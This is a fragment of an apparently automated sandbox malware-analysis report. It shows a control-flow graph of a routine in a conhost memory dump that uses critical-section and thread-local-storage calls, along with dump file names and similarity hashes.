                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 553 14000219e-1400021a5 554 140002272-140002280 553->554 555 1400021ab-1400021c2 EnterCriticalSection 553->555 556 140002265-14000226c LeaveCriticalSection 555->556 557 1400021c8-1400021d6 555->557 556->554 558 1400021e9-1400021f5 TlsGetValue GetLastError 557->558 559 1400021f7-1400021fa 558->559 560 1400021e0-1400021e7 558->560 559->560 561 1400021fc-140002209 559->561 560->556 560->558 561->560
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                          • String ID:
                                          • API String ID: 682475483-0
                                          • Opcode ID: 6aed334ba28e281145827aad8106e07ad7f1f3d084932f70a39d4ad6c8ab7699
                                          • Instruction ID: fd5d896073a876b2497a5a253350f949cfb4402a0739e06ef74f700dacb1e49b
                                          • Opcode Fuzzy Hash: 6aed334ba28e281145827aad8106e07ad7f1f3d084932f70a39d4ad6c8ab7699
                                          • Instruction Fuzzy Hash: 0801AFB5705A0192FA5BDB53FE083E86260B76CBD1F454021EF0953AB4DB798996C200